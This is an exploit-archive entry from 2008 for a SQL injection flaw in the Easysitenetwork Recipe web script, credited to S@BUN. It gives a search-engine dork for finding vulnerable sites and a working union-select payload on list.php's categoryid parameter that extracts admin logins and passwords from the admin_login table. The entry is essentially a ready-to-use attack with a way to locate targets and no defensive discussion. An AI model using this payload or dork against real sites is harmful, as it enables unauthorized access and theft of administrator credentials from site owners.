id: 2532
date: 01/22/2008
title: Easysitenetwork Recipe (categoryid) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

=====================================================================
Easysitenetwork Recipe (categoryid) Remote SQL Injection Vulnerabilit
=====================================================================



#########################################################################
#
# Recipes hacking(list.php?pagenum)SQL Injection
#
#
#########################################################################
#
# AUTHOR : S@BUN
#
#########################################################################
#
# DORKS 2 : allinurl: " list.php?pagenum"
#
#########################################################################
# EXPLOIT
#
# list.php?pagenum=0&categoryid=1+union+select+111,222,concat_ws(char(58),login,password),444+from+admin_login/*
#




#  0day.today [2023-03-23]  #